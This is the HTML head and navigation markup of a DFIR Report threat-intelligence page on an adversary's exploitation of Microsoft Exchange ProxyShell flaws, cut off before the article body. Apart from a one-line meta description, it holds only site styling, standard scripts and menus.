CINXE.COM
PHOSPHORUS Automates Initial Access Using ProxyShell – The DFIR Report
<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>PHOSPHORUS Automates Initial Access Using ProxyShell – The DFIR Report</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='preconnect' href='//c0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Feed" href="https://thedfirreport.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Comments Feed" href="https://thedfirreport.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thedfirreport.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <link rel='stylesheet' id='jetpack_related-posts-css' href='https://c0.wp.com/p/jetpack/14.3/modules/related-posts/related-posts.css' type='text/css' media='all' /> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.7.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.7.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.7.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <style id='jetpack-sharing-buttons-style-inline-css' type='text/css'> .jetpack-sharing-buttons__services-list{display:flex;flex-direction:row;flex-wrap:wrap;gap:0;list-style-type:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;padding-inline-start:0}ul.jetpack-sharing-buttons__services-list.has-background{padding:1.25em 2.375em} </style> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='freenews-style-css' href='https://thedfirreport.com/wp-content/themes/freenews/style.css?ver=6.7.2' type='text/css' media='all' /> <style id='freenews-style-inline-css' type='text/css'> .tags-links, .byline, .comments-link { clip: rect(1px, 1px, 1px, 1px); height: 1px; position: absolute; overflow: hidden; width: 1px; } </style> <link rel='stylesheet' id='font-awesome-css' href='https://thedfirreport.com/wp-content/themes/freenews/assets/library/fontawesome/css/all.min.css?ver=6.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='freenews-google-fonts-css' href='https://thedfirreport.com/wp-content/fonts/d92fef3d9e5de6f7993b11046e265436.css' type='text/css' media='all' /> <link rel='stylesheet' id='sharedaddy-css' href='https://c0.wp.com/p/jetpack/14.3/modules/sharedaddy/sharing.css' type='text/css' media='all' /> <link rel='stylesheet' id='social-logos-css' href='https://c0.wp.com/p/jetpack/14.3/_inc/social-logos/social-logos.min.css' type='text/css' media='all' /> <script type="text/javascript" id="jetpack_related-posts-js-extra"> /* <![CDATA[ */ var related_posts_js_options = {"post_heading":"h4"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.3/_inc/build/related-posts/related-posts.min.js" id="jetpack_related-posts-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/jquery/jquery.min.js" id="jquery-core-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/jquery/jquery-migrate.min.js" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/global.js?ver=1" id="freenews-global-js"></script> <link rel="https://api.w.org/" href="https://thedfirreport.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://thedfirreport.com/wp-json/wp/v2/posts/5981" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://thedfirreport.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.2" /> <link rel="canonical" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" /> <link rel='shortlink' href='https://thedfirreport.com/?p=5981' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2022%2F03%2F21%2Fphosphorus-automates-initial-access-using-proxyshell%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2022%2F03%2F21%2Fphosphorus-automates-initial-access-using-proxyshell%2F&format=xml" /> <!-- GA Google Analytics @ https://m0n.co/ga --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-162747485-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-162747485-1'); </script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//thedfirreport.com/?wordfence_lh=1&hid=683037B30A4672A35B0AC099FE9BA9A6'); </script> <style>img#wpstats{display:none}</style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f8f8f8; } </style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="article" /> <meta property="og:title" content="PHOSPHORUS Automates Initial Access Using ProxyShell" /> <meta property="og:url" content="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" /> <meta property="og:description" content="In December 2021, we observed an adversary exploiting the Microsoft Exchange ProxyShell vulnerabilities to gain initial access and execute code via multiple web shells. The overlap of activities an…" /> <meta property="article:published_time" content="2022-03-21T01:55:06+00:00" /> <meta property="article:modified_time" content="2022-12-10T13:37:33+00:00" /> <meta property="og:site_name" content="The DFIR Report" /> <meta property="og:image" content="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png" /> <meta property="og:image:width" content="1673" /> <meta property="og:image:height" content="1447" /> <meta property="og:image:alt" content="" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="PHOSPHORUS Automates Initial Access Using ProxyShell" /> <meta name="twitter:image" content="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png?w=640" /> <meta name="twitter:card" content="summary_large_image" /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-32x32.png" sizes="32x32" /> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-180x180.png" /> <meta name="msapplication-TileImage" content="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-270x270.png" /> </head> <body class="post-template-default single single-post postid-5981 single-format-standard custom-background has-sidebar tags-hidden author-hidden comment-hidden"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header"> <div id="main-header" class="main-header"> <div class="navigation-top"> <div class="wrap"> <div id="site-header-menu" class="site-header-menu"> <nav class="main-navigation" aria-label="Primary Menu" role="navigation"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="toggle-text">Menu</span> <span class="toggle-bar"></span> </button> <ul id="primary-menu" class="menu nav-menu"><li id="menu-item-21337" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-21337"><a href="https://thedfirreport.com/">Reports</a></li> <li id="menu-item-21314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21314"><a href="https://thedfirreport.com/analysts/">Analysts</a></li> <li id="menu-item-21315" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21315"><a href="https://thedfirreport.com/services/">Services</a> <ul class="sub-menu"> <li id="menu-item-21319" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21319"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-21318" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21318"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li id="menu-item-31055" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31055"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li id="menu-item-35456" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35456"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li id="menu-item-32606" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32606"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li id="menu-item-38108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38108"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li id="menu-item-21320" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21320"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> <li id="menu-item-21317" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21317"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li id="menu-item-21325" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21325"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li id="menu-item-21326" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21326"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> </ul> </li> <li id="menu-item-31033" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31033"><a href="https://store.thedfirreport.com/collections/dfir-labs">Access DFIR Labs</a></li> <li id="menu-item-21313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21313"><a href="https://thedfirreport.com/subscribe/">Subscribe</a></li> <li id="menu-item-21316" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21316"><a href="https://thedfirreport.com/contact/">Contact Us</a></li> </ul> </nav><!-- #site-navigation --> </div> </div><!-- .wrap --> </div><!-- .navigation-top --> <nav class="secondary-navigation" role="navigation" aria-label="Secondary Navigation"> <div class="wrap"> <button class="secondary-menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="secondary-toggle-text">Menu</span> <span class="secondary-toggle-bar"></span> </button> <ul id="primary-menu" class="secondary-menu"><li id="menu-item-21323" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21323"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-21322" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21322"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li id="menu-item-31037" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31037"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li id="menu-item-35457" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35457"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li id="menu-item-32608" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32608"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li id="menu-item-38110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38110"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li id="menu-item-21321" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21321"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li id="menu-item-21327" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21327"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li id="menu-item-21328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21328"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> <li id="menu-item-21324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21324"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> </ul> </div><!-- .wrap --> </nav><!-- .secondary-navigation --> <div class="main-header-brand"> <div class="header-brand"> <div class="wrap"> <div class="header-brand-content"> <div class="site-branding"> <div class="site-branding-text"> <p class="site-title"><a href="https://thedfirreport.com/" rel="home">The DFIR Report</a></p> <p class="site-description">Real Intrusions by Real Attackers, The Truth Behind the Intrusion</p> </div><!-- .site-branding-text --> </div><!-- .site-branding --> <div class="header-right"> <div class="header-banner"> </div><!-- .header-banner --> </div><!-- .header-right --> </div><!-- .header-brand-content --> </div><!-- .wrap --> </div><!-- .header-brand --> <div id="nav-sticker"> <div class="navigation-top"> <div class="wrap"> <div id="site-header-menu" class="site-header-menu"> <nav id="site-navigation" class="main-navigation" aria-label="Primary Menu"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="toggle-text">Menu</span> <span class="toggle-bar"></span> </button> <ul id="primary-menu" class="menu nav-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-21337"><a href="https://thedfirreport.com/">Reports</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21314"><a href="https://thedfirreport.com/analysts/">Analysts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21315"><a href="https://thedfirreport.com/services/">Services</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21319"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21318"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31055"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35456"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32606"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38108"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21320"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21317"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21325"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21326"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31033"><a href="https://store.thedfirreport.com/collections/dfir-labs">Access DFIR Labs</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21313"><a href="https://thedfirreport.com/subscribe/">Subscribe</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21316"><a href="https://thedfirreport.com/contact/">Contact Us</a></li> </ul> </nav><!-- #site-navigation --> </div> </div><!-- 